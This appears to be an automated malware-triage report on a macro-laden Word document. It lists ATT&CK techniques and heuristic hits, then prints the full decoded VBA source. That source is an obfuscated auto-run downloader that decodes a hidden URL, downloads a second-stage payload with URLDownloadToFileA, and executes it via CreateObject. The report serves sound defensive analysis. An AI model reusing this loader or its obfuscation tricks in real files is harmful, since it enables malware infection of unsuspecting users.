MALICIOUS
Risk Score: 360
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
- T1071.001 Web Protocols
The sample contains obfuscated VBA macros that execute upon opening the document. These macros utilize the URLDownloadToFileA API to download a second-stage payload from a hardcoded URL and then execute it using CreateObject. This indicates downloader or dropper functionality.
Heuristics (11)
- ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API
- VBA macros detected (medium, 6 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD): URLDownloadToFile in VBA
  Matched line in script: Attribute VB_Customizable = True Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr Sub Document_Open()
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0) Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P"))) p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script: hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0) Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P"))) p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro
  Matched line in script: Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr Sub Document_Open() Hz9nTLRgw
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
  Matched line in script: Dim p3lzLi85AKeDJ3Fx dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc") P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC")
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4674 bytes |

SHA-256: 8161f102046c7caf14d3f29e4c90e7d20c6a1fb79708521ce492dd2a802828b9

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 45 of 88 identifiers look randomly generated (e.g. 'JMftNOuWtfOh9pi8W_smt'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
Sub Document_Open()
Hz9nTLRgw
End Sub
Sub Hz9nTLRgw()
Dim P6OcuF
Dim hGxsDgQQfRCA4d
Dim dpXyOdLN5Xk7rX
Dim p3lzLi85AKeDJ3Fx
dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc")
P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC")
hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
End Sub
Private Function MCk5jNez(l6iMNaGqPG As String, KLvOqFHtiFY As String) As String
On Error Resume Next
Dim lTkmM(0 To 255) As Byte
Dim GNwtrKSYY(0 To 255) As Byte
Dim tb9O4HuUkNekQ1Jqah As Byte
Dim OmzSlVcPoG As Long
Dim hl5KQR6YxTYF2zdV As Long
Dim OmzSlVcPoGdx As Long
Dim prk1kspXxT8zeTE As String
Dim zwZuFXIj As String
Dim UbS12KlpsKiGj0K As Long
For UbS12KlpsKiGj0K = 1 To Len(l6iMNaGqPG) Step 2
prk1kspXxT8zeTE = Chr$(Val(b9UY4DO("&", "H") & Mid$(l6iMNaGqPG, UbS12KlpsKiGj0K, 2)))
zwZuFXIj = zwZuFXIj & prk1kspXxT8zeTE
Next UbS12KlpsKiGj0K
l6iMNaGqPG = zwZuFXIj
For OmzSlVcPoGdx = 0 To 255
lTkmM(OmzSlVcPoGdx) = OmzSlVcPoGdx
GNwtrKSYY(OmzSlVcPoGdx) = Asc(Mid$(KLvOqFHtiFY, 1 + (OmzSlVcPoGdx Mod Len(KLvOqFHtiFY)), 1))
Next
For OmzSlVcPoG = 0 To 255
hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG) + GNwtrKSYY(OmzSlVcPoG)) Mod 256
tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
Next
OmzSlVcPoG = 0
hl5KQR6YxTYF2zdV = 0
For OmzSlVcPoGdx = 1 To Len(l6iMNaGqPG)
OmzSlVcPoG = (OmzSlVcPoG + 1) Mod 256
hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG)) Mod 256
tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
MCk5jNez = MCk5jNez & Chr$((vs8i4ov(lTkmM((CLng(lTkmM(OmzSlVcPoG)) + lTkmM(hl5KQR6YxTYF2zdV)) Mod 256), Asc(Mid$(l6iMNaGqPG, OmzSlVcPoGdx, 1)))))
Next
End Function
Private Function vs8i4ov(ByVal OmzSlVcPoG As Long, ByVal hl5KQR6YxTYF2zdV As Long) As Long
On Error Resume Next
If OmzSlVcPoG = hl5KQR6YxTYF2zdV Then
vs8i4ov = hl5KQR6YxTYF2zdV
Else
vs8i4ov = OmzSlVcPoG Xor hl5KQR6YxTYF2zdV
End If
End Function
Function eXbnDKMvOhj(Hfr9620sTYhaxpLYEo As String, bjNjfg5VkxuB3Ws3A6 As String)
eXbnDKMvOhj = Hfr9620sTYhaxpLYEo + bjNjfg5VkxuB3Ws3A6
End Function
Function PDOCte(KaZnFX As String, rhpiC8f As String)
PDOCte = KaZnFX + rhpiC8f
End Function
Function FWjFM37eg(kAtwCT0WGuYNe45mB As String, MH1w8BVoNf2 As String)
FWjFM37eg = kAtwCT0WGuYNe45mB + MH1w8BVoNf2
End Function
Function rSdI2XFZR8T(lVCli9DueJ4JtgAV As String, c3Wk2BZjEklgedrE9 As String)
rSdI2XFZR8T = lVCli9DueJ4JtgAV + c3Wk2BZjEklgedrE9
End Function
Function jES4Wyj0(rRINcxXRADh2S000l As String, V1iKd2TPSDzgD5 As String)
jES4Wyj0 = rRINcxXRADh2S000l + V1iKd2TPSDzgD5
End Function
Function Fg2oaYYH(sI4UFQYCb0L1BHkg As String, sEi75WnGtDVKRU As String)
Fg2oaYYH = sI4UFQYCb0L1BHkg + sEi75WnGtDVKRU
End Function
Function b9UY4DO(cIahv As String, VCwo6JI0I7hW As String)
b9UY4DO = cIahv + VCwo6JI0I7hW
End Function
Function dyVR7(oyMcmlHEMD As String) As String
Dim YwfEtoOry0(1055) As Byte
Dim Jkq3Y1LFGMVu8N9() As Byte
Dim nzFwEZgadUlgCb32
Dim S51G9FNk4y31Wr
Jkq3Y1LFGMVu8N9 = StrConv(oyMcmlHEMD, vbFromUnicode)
For S51G9FNk4y31Wr = 0 To UBound(Jkq3Y1LFGMVu8N9) - 1
If (S51G9FNk4y31Wr Mod 5 = 0) Then
YwfEtoOry0(nzFwEZgadUlgCb32) = Jkq3Y1LFGMVu8N9(S51G9FNk4y31Wr)
nzFwEZgadUlgCb32 = nzFwEZgadUlgCb32 + 1
End If
Next S51G9FNk4y31Wr
dyVR7 = Left(StrConv(YwfEtoOry0, vbUnicode), nzFwEZgadUlgCb32)
End Function